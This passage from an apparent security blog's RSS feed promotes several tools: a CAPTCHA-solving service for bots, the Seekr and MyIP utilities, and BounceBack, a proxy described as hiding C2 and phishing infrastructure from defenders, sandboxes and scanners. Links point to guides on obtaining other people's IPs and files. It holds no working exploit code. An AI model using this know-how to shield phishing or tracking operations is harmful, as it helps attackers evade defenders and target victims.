<h2 id="ftoc-loi-ich-khi-su-dung-capsolver" class="ftwp-heading"><strong>Benefits when using capsolver</strong></h2>
<h3 id="ftoc-tiet-kiem-thoi-gian-cong-suc" class="ftwp-heading"><strong>Save time &#038; effort</strong></h3>
<p>Imagine you have to solve hundreds, even thousands of captcha every day. This is not only time -consuming but also causing fatigue and reducing work efficiency. Capsolver will automate this process, freeing you from repetitive tasks, allowing you to focus on more important tasks.</p>
<figure id="attachment_66038" aria-describedby="caption-attachment-66038" style="width: 614px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-66038 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-4.jpg" alt="Price list of capsolver" width="614" height="650" srcset="https://anonyviet.com/wp-content/uploads/2024/08/capsolver-4.jpg 614w, https://anonyviet.com/wp-content/uploads/2024/08/capsolver-4-283x300.jpg 283w" sizes="auto, (max-width: 614px) 100vw, 614px"/><figcaption id="caption-attachment-66038" class="wp-caption-text">Price list of capsolver</figcaption></figure>
<h3 id="ftoc-nang-cao-hieu-qua-tu-dong-hoa" class="ftwp-heading"><strong>Improve automation efficiency</strong></h3>
<p>With the ability to solve captcha quickly and accurately, Capsolver helps optimize your automation process. Your BOT will work smoothly, collect data faster and more effectively.</p>
<h3 id="ftoc-chi-phi-phai-chang" class="ftwp-heading"><strong>Affordable cost</strong></h3>
<p>Capsolver applies a turn -based payment model, you only have to pay for the resolved captcha. This helps you control costs effectively, especially for small projects or large -scale operation.</p>
<h3 id="ftoc-ho-tro-24-7" class="ftwp-heading"><strong>Support 24/7</strong></h3>
<p>With a professional support team 24/7, you can rest assured that Capsolver is always ready to assist you at any time, ensuring your automation process goes smoothly.</p>
<p><span style="color: #339966;"><em><strong>See also: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fmr-holmes-cong-cu-thu-thap-thong-tin-danh-cho-dan-osint%2F" class="local-link">Mr Holmes: Information collection tool for Osint people</a></strong></em></span></p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Conclusion</strong></h2>
<p><strong>Capsolver</strong> is a comprehensive and effective solution to overcome the Captcha barrier, helping you automate online tasks easily and quickly. With high speed, accuracy, easy -to -use API and reasonable cost, Capsolver is the optimal choice for developers, businesses and anyone who wants to optimize their automation process.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/capsolver-automatic-solution-solution-for-business/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/08/capsolver.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Seekr: Collect &#038; manage OSINT data</title>
		<link>https://en.anonyviet.com/seekr-collect-manage-osint-data/</link>
					<comments>https://en.anonyviet.com/seekr-collect-manage-osint-data/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 21 Nov 2024 23:49:42 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[collect]]></category>
		<category><![CDATA[data]]></category>
		<category><![CDATA[manage]]></category>
		<category><![CDATA[OSINT]]></category>
		<category><![CDATA[SEEKR]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=17415</guid>

					<description><![CDATA[Collecting and analyzing information from open sources (OSINT) is becoming increasingly important. Whether you are a researcher, journalist, cybersecurity expert, or simply someone who wants to learn more about the world around you, having a powerful and effective OSINT tool is essential. Let&#39;s find out Seekra versatile and easy-to-use OSINT toolkit that promises to revolutionize [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Collecting and analyzing information from open sources (OSINT) is becoming increasingly important. Whether you are a researcher, journalist, cybersecurity expert, or simply someone who wants to learn more about the world around you, having a powerful and effective OSINT tool is essential. Let&#39;s find out <strong>Seekr</strong>a versatile and easy-to-use OSINT toolkit that promises to revolutionize the way you access and exploit information from open source.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-gioi-thieu-ve-seekr" class="ftwp-heading"><strong>Introducing Seekr</strong></h2>
<p>Seekr is a versatile toolkit designed to collect and manage OSINT (Open Source Intelligence) data through an intuitive and easy-to-use web interface. Seekr&#39;s desktop interface allows you to integrate all your favorite OSINT tools into a single place.</p>
<figure id="attachment_65148" aria-describedby="caption-attachment-65148" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65148 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/seekr-1.jpg" alt="Introducing Seekr" width="800" height="400" srcset="https://anonyviet.com/wp-content/uploads/2024/08/seekr-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/seekr-1-300x150.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/seekr-1-768x384.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/seekr-1-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2024/08/seekr-1-750x375.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65148" class="wp-caption-text">Introducing Seekr</figcaption></figure>
<p>Written in the Go language with BadgerDB as the database, Seekr offers a range of powerful features for data collection, organization and analysis. Whether you are a researcher, investigator, or simply someone who wants to gather information, Seekr will help you easily find and manage the data you need.</p>
<p><span style="color: #339966;"><em><strong>See more: Instructions <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhuong-dan-lay-ip-nguoi-khac-bang-email-qr-code-file-word-excel-pdf%2F" class="local-link" rel="noopener">get someone else&#39;s IP by Email, QR Code, Word File, Excel, PDF,&#8230;</a></strong></em></span></p>
<h2 id="ftoc-cac-tinh-nang-chinh-cua-seekr" class="ftwp-heading"><strong>Key features of Seekr</strong></h2>
<ul>
<li>NO API key required for all features, saving time and effort on API key registration and management.</li>
<li>Desktop interface is familiar and easy to use.</li>
<li>The database for OSINT targets is efficiently stored and organized.</li>
<li>Integration/tuning of many popular OSINT tools (e.g. phoneinfoga)</li>
<li>Search for information related to email addresses on GitHub.</li>
<li>Enter the information you have and get recommendations for useful web tools.</li>
<li>Account cards for each person in the database to manage information about individuals in detail.</li>
<li>Automatically search and link online accounts.</li>
<li>Predefined fields are commonly used in databases, helping to save data entry time and ensure consistency.</li>
<li>Customize themes and plugins to extend Seekr&#39;s functionality.</li>
</ul>
<figure id="attachment_65149" aria-describedby="caption-attachment-65149" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65149 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/seekr-2.jpg" alt="Key features of Seekr" width="800" height="554" srcset="https://anonyviet.com/wp-content/uploads/2024/08/seekr-2.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/seekr-2-300x208.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/seekr-2-768x532.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/seekr-2-750x519.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65149" class="wp-caption-text">Key features of Seekr</figcaption></figure>
<h2 id="ftoc-huong-dan-cai-dat-seekr" class="ftwp-heading"><strong>Instructions for installing Seekr</strong></h2>
<p><strong>Note:</strong> Unstable builds may contain bugs and are not recommended for use in production environments.</p>
<h3 id="ftoc-cai-dat-seekr-tren-windows" class="ftwp-heading"><strong>Install Seekr on Windows</strong></h3>
<p>Download and run the latest exe file <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fseekr-osint%2Fseekr%2Freleases%2Flatest" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><span style="text-decoration: underline;">here</span></a></strong>. Then open <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Flocalhost%3A8569%2Fweb%2F" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><strong>web interface</strong></a></span>  in the browser.</p>
<ul>
<li><strong>Unstable version:</strong></li>
</ul>
<p>First, install TypeScript and Go. Then to install Seekr on Windows, run the following commands:</p>
<p><code>git clone https://github.com/seekr-osint/seekr</code><br /><code>cd seekr</code><br /><code>go generate ./...</code><br /><code>tsc --project web</code><br /><code>go run main.go</code></p>
<h3 id="ftoc-cai-dat-seekr-voi-docker" class="ftwp-heading"><strong>Install Seekr with Docker</strong></h3>
<p><code>docker pull ghcr.io/seekr-osint/seekr:latest</code><br /><code>docker run -p 8569:8569 ghcr.io/seekr-osint/seekr:latest</code></p>
<h3 id="ftoc-cai-dat-seekr-tren-linux" class="ftwp-heading"><strong>Install Seekr on Linux</strong></h3>
<p>Download the latest stable binary file <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fseekr-osint%2Fseekr%2Freleases%2Flatest" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><span style="text-decoration: underline;">here</span></a></strong></p>
<ul>
<li><strong>Unstable version:</strong></li>
</ul>
<p>Make sure you have TypeScript and Go installed. To install Seekr on Linux, run the following commands:</p>
<p><code>git clone https://github.com/seekr-osint/seekr</code><br /><code>cd seekr</code><br /><code>go generate ./...</code><br /><code>tsc --project web</code><br /><code>go run main.go</code></p>
<p>Then open <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Flocalhost%3A8569%2Fweb%2F" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">web interface</a></strong>  in the browser.</p>
<h3 id="ftoc-chay-seekr-tren-nixos" class="ftwp-heading"><strong>Run Seekr on NixOS</strong></h3>
<p>Seekr is built with NixOS and supports nix flakes. To run Seekr on NixOS, run the following commands:</p>
<p><code>nix shell github:seekr-osint/seekr</code><br /><code>seekr</code></p>
<h2 id="ftoc-cach-su-dung-seekr" class="ftwp-heading"><strong>How to use Seekr</strong></h2>
<p>You can refer to the instructions for using this tool through the article <strong><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fseekr-bo-cong-cu-thu-thap-du-lieu-bang-osint%2F" class="local-link" rel="noopener"><span style="text-decoration: underline;">THIS</span></a></strong></p>
<p><span style="color: #339966;"><em><strong>See more: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fdns-spy-cong-cu-phan-tich-dns-cua-domain-bat-ky%2F" class="local-link" rel="noopener">DNS Spy</a>: DNS analysis tool for any domain</strong></em></span></p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Conclusion</strong></h2>
<p><strong>Seekr</strong> is a flexible OSINT tool that provides users with a comprehensive solution for collecting, organizing and analyzing data from open sources. With a user-friendly interface, integration with many popular tools, and high customization capabilities, Seekr is ideal for researchers, investigators, and anyone who wants to harness the power of OSINT.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/seekr-collect-manage-osint-data/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/08/seekr.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>MyIP: Comprehensive IP information checking tool</title>
		<link>https://en.anonyviet.com/myip-comprehensive-ip-information-checking-tool/</link>
					<comments>https://en.anonyviet.com/myip-comprehensive-ip-information-checking-tool/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 19 Nov 2024 21:50:55 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Checking]]></category>
		<category><![CDATA[Comprehensive]]></category>
		<category><![CDATA[Information]]></category>
		<category><![CDATA[MyIP]]></category>
		<category><![CDATA[tool]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=17394</guid>

					<description><![CDATA[MyIPa comprehensive network testing tool, emerges as an effective solution to help users understand and manage their internet connection effectively. In an increasingly digital world, ensuring security and optimizing network performance has become extremely important. MyIP doesn&#39;t simply display IP addresses, but also offers a range of in-depth testing features, from network speed, DNS leaks, [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><strong>MyIP</strong>a comprehensive network testing tool, emerges as an effective solution to help users understand and manage their internet connection effectively. In an increasingly digital world, ensuring security and optimizing network performance has become extremely important. MyIP doesn&#39;t simply display IP addresses, but also offers a range of in-depth testing features, from network speed, DNS leaks, WebRTC to censorship testing and Whois lookups.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-nhung-tinh-nang-chinh-cua-myip" class="ftwp-heading"><strong>Main features of MyIP</strong></h2>
<ul>
<li><strong>Display IP Address</strong>: The application will Identify and display local IP addresses from various IPv4 and IPv6 providers.</li>
<li><strong>IP Information</strong>: Provides details about every IP address, including country, region, ASN, geolocation, and more.</li>
<li><strong>Check Availability:</strong> Determine availability of sites like Google, GitHub, YouTube, ChatGPT, and many others.</li>
<li><strong>WebRTC Detection:</strong> Determines the IP address used in WebRTC connections.</li>
<li><strong>DNS Leak Check:</strong> Displays data from DNS endpoints to assess the risk of DNS leaks when using a VPN or proxy.</li>
<li><strong>Network Speed ​​Test:</strong> Evaluate the speed of your network connection to edge networks.</li>
<li><strong>Check Proxy Rules:</strong> Check the proxy software&#39;s rule settings to make sure they are working correctly.</li>
<li><strong>Global Latency Test:</strong> Perform latency tests on servers in different regions of the world.</li>
<li><strong>MTR Test:</strong> Perform MTR tests on servers in different regions around the globe.</li>
<li><strong>DNS Resolver:</strong> Perform DNS resolution of a domain name from various sources and collect real-time resolution results to identify DNS poisoning.</li>
<li><strong>Censorship Test:</strong> Check to see if a website is blocked in certain countries.</li>
<li><strong>Whois Lookup:</strong> Perform a whois lookup for the domain name or IP address.</li>
<li><strong>MAC Address Lookup:</strong> Query information of a physical address.</li>
<li><strong>Dark Mode:</strong> Automatically switch between dark and light modes based on system settings, or you can switch manually.</li>
<li><strong>Minimalist Mode:</strong> Optimized mode for mobile, shortening page length for quick access to necessary information.</li>
<li><strong>Look Up IP Information:</strong> Provides a tool to look up information about any IP address.</li>
<li><strong>PWA Support:</strong> Can be added as an app on your phone or as a Chrome app on your computer.</li>
<li><strong>Shortcut Keys:</strong> Supports keyboard shortcuts for all functions, press ? to see a list of keyboard shortcuts.<br />Based on the availability test results, indicate whether a global internet connection is possible.</li>
<li>Support English, Chinese and French.</li>
</ul>
<figure id="attachment_65263" aria-describedby="caption-attachment-65263" style="width: 800px" class="wp-caption aligncenter"><img title="MyIP: Comprehensive IP information checking tool" decoding="async" class="wp-image-65263 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/myip-1.jpg" alt="Main features of MyIP" width="800" height="274" srcset="https://anonyviet.com/wp-content/uploads/2024/08/myip-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/myip-1-300x103.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/myip-1-768x263.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/myip-1-750x257.jpg 750w" sizes="(max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65263" class="wp-caption-text">Main features of MyIP</figcaption></figure>
<p><span style="color: #339966;"><em><strong>See more: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fde-digger-cong-cu-tim-file-cua-nguoi-khac-tren-google-drive%2F" class="local-link" rel="noopener">De digger: Tool to find other people&#39;s files on Google Drive</a></strong></em></span></p>
<h2 id="ftoc-cach-su-dung-myip" class="ftwp-heading"><strong>How to use MyIP</strong></h2>
<h3 id="ftoc-trien-khai-myip-trong-moi-truong-node" class="ftwp-heading"><strong>Deploying MyIP in a Node</strong></h3>
<p><strong>Step 1:</strong> First, make sure you have Node.js installed before proceeding</p>
<p><strong>Step 2:</strong> Copy the following code:</p>
<p><code>git clone https://github.com/jason5ng32/MyIP.git</code></p>
<p><strong>Step 3:</strong> Run the following command to install and build:</p>
<p><code>npm install &amp;&amp; npm run build</code></p>
<p><strong>Step 4:</strong> Run the program with this command:</p>
<p><code>npm start</code></p>
<p>The program will run on port 18966.</p>
<h3 id="ftoc-su-dung-docker" class="ftwp-heading"><strong>Use Docker</strong></h3>
<p>Click the &#39;Deploy to Docker&#39; Button at the top of the page to complete the deployment.</p>
<p>Or use the following shell command:</p>
<p><code>docker run -d -p 18966:18966 --name myip --restart always jason5ng32/myip:latest</code></p>
<h2 id="ftoc-bien-moi-truong-environment-variable" class="ftwp-heading"><strong>Environment Variable</strong></h2>
<p>You can use the program without adding any environment variables, but if you want to use some advanced features, you can add environment variables.<br />List of environment variables you can refer to at <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fjason5ng32%2FMyIP" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><span style="text-decoration: underline;">MyIP&#39;s Github page</span></a></strong></p>
<h3 id="ftoc-su-dung-bien-moi-truong-trong-node-js" class="ftwp-heading"><strong>Using environment variables in Node.js</strong></h3>
<p>To customize MyIP in Node.js, you can use environment variables. Below are the detailed steps:</p>
<p><strong>Step 1:</strong> To create environment variables, you can follow these steps:</p>
<p><code>cp .env.example .env</code></p>
<p><strong>Step 2:</strong> Then, edit the .env file content and add the following lines:</p>
<p><code>BACKEND_PORT=11966</code><br /><code>FRONTEND_PORT=18966</code><br /><code>BING_MAP_API_KEY="YOUR_KEY_HERE"</code><br /><code>ALLOWED_DOMAINS="example.com"</code><br /><code>IPCHECKING_API="YOUR_KEY_HERE"</code></p>
<p><strong>Step 3:</strong> Finally, restart the backend service to apply the changes.</p>
<p><strong>Explanation of environment variables:</strong></p>
<ul>
<li>BACKEND_PORT: Port on which the backend server will listen.</li>
<li>FRONTEND_PORT: Port on which the frontend user interface will run.</li>
<li>BING_MAP_API_KEY: Bing Maps API key, used for features related to geolocation.</li>
<li>ALLOWED_DOMAINS: List of domains allowed to access the application.</li>
<li>IPCHECKING_API: API key of the IP checking service, used to verify IP addresses.</li>
</ul>
<h3 id="ftoc-su-dung-bien-moi-truong-trong-docker" class="ftwp-heading"><strong>Using environment variables in Docker</strong></h3>
<p>You can also use environment variables when running MyIP in Docker. For example:</p>
<p><code>docker run -d -p 18966:18966 \</code><br /><code>-e BING_MAP_API_KEY="YOUR_KEY_HERE" \</code><br /><code>-e ALLOWED_DOMAINS="example.com" \</code><br /><code>-e IPCHECKING_API="YOUR_TOKEN_HERE" \</code><br /><code>--name myip \</code><br /><code>jason5ng32/myip:latest</code></p>
<h2 id="ftoc-cach-su-dung-myip-nang-cao" class="ftwp-heading"><strong>How to use MyIP advancedly</strong></h2>
<p>If you are using a proxy to access the internet, consider adding the following rule to your proxy configuration (edit depending on the application you use). This setup allows you to check both the real IP and the IP when using a proxy:</p>
<p><code># IP Testing</code><br /><code>IP-CIDR,1.0.0.1/32,DIRECT,no-resolve</code><br /><code>IP-CIDR6,2606:4700:4700::1111/128,DIRECT,no-resolve</code><br /><code>DOMAIN-SUFFIX,ipify.org,Proxy</code><br /><code># Rule Testing</code><br /><code>DOMAIN,ptest-1.ipcheck.ing,Proxy1</code><br /><code>DOMAIN,ptest-2.ipcheck.ing,Proxy2</code><br /><code>DOMAIN,ptest-3.ipcheck.ing,Proxy3</code><br /><code>DOMAIN,ptest-4.ipcheck.ing,Proxy4</code><br /><code>DOMAIN,ptest-5.ipcheck.ing,Proxy5</code><br /><code>DOMAIN,ptest-6.ipcheck.ing,Proxy6</code><br /><code>DOMAIN,ptest-7.ipcheck.ing,Proxy7</code><br /><code>DOMAIN,ptest-8.ipcheck.ing,Proxy8</code></p>
<p><strong>Proxy rule explanation:</strong></p>
<ul>
<li>IP-CIDR and IP-CIDR6: Route requests to specific IP addresses directly, not through a proxy.</li>
<li>DOMAIN-SUFFIX: Routes requests to the ipify.org domain through the proxy.</li>
<li>DOMAIN: Route requests to ptest-*.ipcheck.ing domains through different proxies (Proxy1 to Proxy8).</li>
</ul>
<p><strong>Note:</strong> This configuration is just an example, you need to adjust it to your specific proxy configuration.</p>
<p><span style="color: #339966;"><em><strong>See more: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F10-cong-cu-osint-ma-hacker-can-biet%2F" class="local-link" rel="noopener">10 OSINT tools that hackers need to know</a></strong></em></span></p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Conclusion</strong></h2>
<p>In short, <strong>MyIP</strong> is a powerful and flexible tool that provides a comprehensive solution for network testing and online privacy protection. With a friendly and easy-to-use interface, MyIP is the perfect choice for individual users and even professionals.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/myip-comprehensive-ip-information-checking-tool/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/08/myip.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>BounceBack: Shield protects C2/Phishing infrastructure from attacks</title>
		<link>https://en.anonyviet.com/bounceback-shield-protects-c2-phishing-infrastructure-from-attacks/</link>
					<comments>https://en.anonyviet.com/bounceback-shield-protects-c2-phishing-infrastructure-from-attacks/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 17 Nov 2024 22:36:59 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[attacks]]></category>
		<category><![CDATA[BounceBack]]></category>
		<category><![CDATA[C2Phishing]]></category>
		<category><![CDATA[infrastructure]]></category>
		<category><![CDATA[Protects]]></category>
		<category><![CDATA[Shield]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=17371</guid>

					<description><![CDATA[Protecting infrastructure from cyber attacks is becoming increasingly important. Especially for C2/Phishing systems, anonymity and security are key factors to maintain operations. BounceBack – a powerful and flexible reverse proxy – is designed to meet this need. With high customization, smart filtering system and WAF integration, BounceBack is the optimal solution to protect your infrastructure [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Protecting infrastructure from cyber attacks is becoming increasingly important. Especially for C2/Phishing systems, anonymity and security are key factors to maintain operations. BounceBack – a powerful and flexible reverse proxy – is designed to meet this need. With high customization, smart filtering system and WAF integration, <strong>BounceBack</strong> is the optimal solution to protect your infrastructure from surveillance and attacks.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-gioi-thieu-ve-bounceback" class="ftwp-heading"><strong>Introducing BounceBack</strong></h2>
<p><strong>BounceBack</strong> is a powerful reverse proxy, highly customizable and flexible in configuration, integrating WAF (Web Application Firewall) function to help hide your C2/phishing infrastructure from the security team&#39;s eyes (blue). team), sandbox, scanning tools, etc. It uses real-time traffic analysis through many filters to prevent illegal access.</p>
<p>The tool is delivered with a list of blocked words, blocked IP addresses, and preconfigured permissions. For more information on how to use the tool, you can visit the project&#39;s wiki below:</p>
<p style="text-align: center;"><strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack." class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><span style="text-decoration: underline;">Github link</span></a></strong></p>
<figure id="attachment_65341" aria-describedby="caption-attachment-65341" style="width: 800px" class="wp-caption aligncenter"><img title="BounceBack: Shield protects C2/Phishing infrastructure from attacks" loading="lazy" decoding="async" class="wp-image-65341 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-1.jpg" alt="Introducing BounceBack" width="800" height="631" srcset="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/bounceback-1-300x237.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/bounceback-1-768x606.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/bounceback-1-750x592.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65341" class="wp-caption-text">Introducing BounceBack</figcaption></figure>
<p><span style="color: #339966;"><em><strong>See more: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fde-digger-cong-cu-tim-file-cua-nguoi-khac-tren-google-drive%2F" class="local-link" rel="noopener">De digger: Tool to find other people&#39;s files on Google Drive</a></strong></em></span></p>
<h2 id="ftoc-cac-tinh-nang-noi-bat-cua-bounceback" class="ftwp-heading"><strong>Outstanding features of BounceBack</strong></h2>
<p>BounceBack possesses many superior features to help protect your infrastructure effectively:</p>
<ul>
<li>Highly customizable and flexible filtering system: With the ability to combine boolean-based rules (and, or, not), BounceBack can hide your infrastructure from even the most critical eyes of your security team. .</li>
<li>Easily extensible project structure: Everyone can add their own C2 rules, increasing flexibility and customization.</li>
<li>Massive IP blacklist integration: This list includes IP ranges and IPv4 pools known to be relevant to IT security vendors, combined with IP filtering to prevent them from using/downgrading attacks. your floor.</li>
<li>Malleable C2 Configuration Analyzer: BounceBack can validate incoming HTTP(s) traffic against Malleable configuration and reject invalid packets.</li>
<li>Domain Fronting support: This feature helps you hide your infrastructure more effectively.</li>
<li>Check IP geolocation: BounceBack can check the request&#39;s IPv4 address against IP geo/reverse lookup data and compare it with specified regular expressions to rule out connections from Outside companies, countries, cities, domains, etc. are allowed.</li>
<li>Uptime Filter: All incoming requests can be allowed/disallowed for any time period, so you can configure uptime filters.</li>
<li>Multiple proxy support: BounceBack supports multiple proxies with different filtering pipelines on the same instance.</li>
<li>Detailed logging mechanism: Allows you to track all incoming requests and events to analyze security team behavior and debug incidents.</li>
</ul>
<figure id="attachment_65343" aria-describedby="caption-attachment-65343" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65343 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-3.jpg" alt="BounceBack has a huge IP blacklist built-in" width="800" height="398" srcset="https://anonyviet.com/wp-content/uploads/2024/08/bounceback-3.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/bounceback-3-300x149.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/bounceback-3-768x382.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/bounceback-3-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2024/08/bounceback-3-750x373.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65343" class="wp-caption-text">BounceBack has a huge IP blacklist built-in</figcaption></figure>
<h2 id="ftoc-co-che-hoat-dong-cua-quy-tac" class="ftwp-heading"><strong>Mechanism of action of the rule</strong></h2>
<p>The main idea of ​​the rules is how BounceBack matches traffic. The tool currently supports the following rule types:</p>
<ul>
<li>Boolean-based rule combination (and, or, not)</li>
<li>Analyze IP and subnet</li>
<li>Check the IP geolocation fields</li>
<li>Reverse domain lookup</li>
<li>Raw package regular expression matching</li>
<li>Malleable C2 configuration traffic authentication</li>
<li>Working (or non-working) hour rules</li>
<li>Custom Rules: Custom rules can be easily added by registering <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Fblob%2Fmain%2Finternal%2Frules%2Fdefault.go%23L9" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><strong>RuleBaseCreator</strong></a>  or <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Fblob%2Fmain%2Finternal%2Frules%2Fdefault.go%23L3" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><strong>RuleWrapperCreator</strong></a>  your. See the <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Fblob%2Fmain%2Finternal%2Frules%2Fbase_common.go" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><strong>RuleBaseCreator</strong> </a>and <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FD00Movenok%2FBounceBack%2Fblob%2Fmain%2Finternal%2Frules%2Fwrappers.go" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><strong>RuleWrapperCreator</strong></a>  already created in 